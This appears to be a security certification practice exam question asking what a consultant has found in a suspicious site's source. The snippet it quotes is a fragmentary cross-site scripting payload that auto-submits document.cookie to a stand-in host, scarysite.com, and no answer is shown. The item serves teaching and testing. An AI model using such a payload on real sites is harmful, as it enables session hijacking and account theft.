312-92 Question #77: Real Exam Question with Answer & Explanation

Gerald is a web security consultant for Protectors International. Gerald's main responsibility is to search the Internet for malicious and deceitful sites that the public should be aware of. Gerald was tipped off about a particular site and is now looking over its source code in a protected environment. Gerald finds the following snippet particularly interesting. What has Gerald stumbled upon? <script> scarysite.com/getit.php"> <input type=hidden name=sid value="' + escape(document.cookie) + '">'); document.hack.submit(); </script>